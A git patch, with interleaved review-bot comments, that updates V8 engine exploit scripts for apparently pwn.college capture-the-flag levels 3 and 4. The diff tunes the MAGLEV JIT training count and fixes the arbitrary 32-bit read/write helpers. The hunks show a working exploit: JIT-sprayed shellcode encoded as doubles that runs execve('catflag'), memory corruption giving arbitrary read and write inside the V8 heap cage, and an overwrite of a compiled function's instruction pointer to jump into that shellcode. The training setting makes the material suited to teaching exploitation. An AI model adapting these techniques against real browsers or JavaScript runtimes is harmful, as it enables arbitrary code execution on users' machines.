From 90245c7091bbadddd34ad72643bad98acf0e729a Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Sun, 15 Sep 2024 08:57:29 +0800
Subject: [PATCH] Minor Changes to Level 3 & 4 of PwnCollegeV8Exploitation

1. The threshold to trigger MAGLEV compilation is different when gdb is attached to d8 or not.
- When gdb attached to d8, the training loop count to trigger MAGLEV is 100,000.
- But when the standalone d8 running, the training loop count to trigger MAGLEV is only 10,000. If you still use 100,000, it will trigger TURBOFAN then code data structure will change and shellcode execution fails.
2. Fixed other miscellaneous minor mistakes.
---
 JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js | 11 +++++------
 JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js | 11 +++++------
 2 files changed, 10 insertions(+), 12 deletions(-)

diff --git a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
index f9c9337..37340b7 100644
--- a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
+++ b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js
@@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training
 // JIT spray machine code form of `execve("catflag", NULL, NULL)`
 return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
 }
-for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
 // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array
 // map, properties, elements, length --- first three field are static roots
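Review bot: The new `10000` on the `+for` line is a tuning constant whose value, per the commit message, depends on whether a debugger is attached (100,000 under gdb, 10,000 standalone), yet the line comment still says only "Trigger MAGLEV compilation", so a later reader cannot tell why the count changed or that a larger one changes the outcome. Hoist it into a named constant that carries that caveat: `const MAGLEV_TRAINING_ITERS = 10000; // standalone d8; 100000 is only right under gdb (see commit message)` and `for (let i = 0; i < MAGLEV_TRAINING_ITERS; i++) shellcode();`. Level4's first hunk makes the identical change and should share the same constant and comment. shellcode() itself begins above the hunk.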
@@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
 arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000);
 let written = b2f(value);
 fakearr[0] = written;
-console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
+console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
 // ArbRead64(0xfffffff0);
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
 function ArbRead32(cage_addr) { // int32 -> int32
 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
 bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
-let result = si32a[(cage_addr & 0x4) >> 2];
+let result = i32a[(cage_addr & 0x4) >> 2];
 console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
 return result;
 }
+// DWORD Aligned
 function ArbWrite32(cage_addr, value) { // int32, int32 -> void
 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
 let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
 bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
-si32a[(cage_addr & 0x4) >> 2] = value;
+i32a[(cage_addr & 0x4) >> 2] = value;
 ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
 console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
@@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
 console.log("instruction_start: " + instruction_start.toString(16));
 ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
 shellcode();
-
-// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
index a10f78c..bc26401 100644
--- a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
+++ b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js
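Review bot: `written` on the line above the changed `console.log` is now used only for the store into `fakearr[0]`, so `let written` should become `const written`, or the two lines can collapse to `fakearr[0] = b2f(value);`. The log fix itself is correct: `value` is the bigint the caller passed, while `written` is its double reinterpretation, and `Number.prototype.toString(16)` on a double prints the numeric value in hex, not the bit pattern that was written. ArbWrite64 begins above the hunk; Level4's ArbWrite64 hunk has the same `let written` pattern.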
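Review bot: After the rename to `i32a`, ArbRead32 and ArbWrite32 silently depend on `i32a` and `bi64a` being typed-array views over one shared ArrayBuffer, and nothing in the hunk states that (both are declared outside it), so the read-modify-write sequence in ArbWrite32 is hard to follow. A comment on the first line of ArbRead32 would fix that, e.g. `// NOTE(review): assumes i32a and bi64a view the same 8-byte buffer — confirm at the declarations; (cage_addr & 0x4) >> 2 selects the dword within the qword (index 0 is the low dword on a little-endian host)`. The added `// DWORD Aligned` above ArbWrite32 only restates the `throw` message two lines below it; the aliasing comment is the one the reader is missing. Level4's second hunk has the same two points.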
@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training
 // JIT spray machine code form of `execve("catflag", NULL, NULL)`
 return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
 }
-for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation
 let placeholder = {};
 let corrupt_arr = [2.30234590962020889586281057477E-320];
@@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint
 corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
 let written = b2f(value);
 double_arr[0] = written;
-console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`);
+console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
 // DWORD Aligned
 function ArbRead32(cage_addr) { // int32 -> int32
 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
 bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
-let result = si32a[(cage_addr & 0x4) >> 2];
+let result = i32a[(cage_addr & 0x4) >> 2];
 console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
 return result;
 }
+// DWORD Aligned
 function ArbWrite32(cage_addr, value) { // int32, int32 -> void
 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
 let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
 bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
-si32a[(cage_addr & 0x4) >> 2] = value;
+i32a[(cage_addr & 0x4) >> 2] = value;
 ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
 console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
 }
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
 console.log("instruction_start: " + instruction_start.toString(16));
 ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
 shellcode();
-
-// the possibility of getting flag by running exploit once is 1/10
\ No newline at end of file